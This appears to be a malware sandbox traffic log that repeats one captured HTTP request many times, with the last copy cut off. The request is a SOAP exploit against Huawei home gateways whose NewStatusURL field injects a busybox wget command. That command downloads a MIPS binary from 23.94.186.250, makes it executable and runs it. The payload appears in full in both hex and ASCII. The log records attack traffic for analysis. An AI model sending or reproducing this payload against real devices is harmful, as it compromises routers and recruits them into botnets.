              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 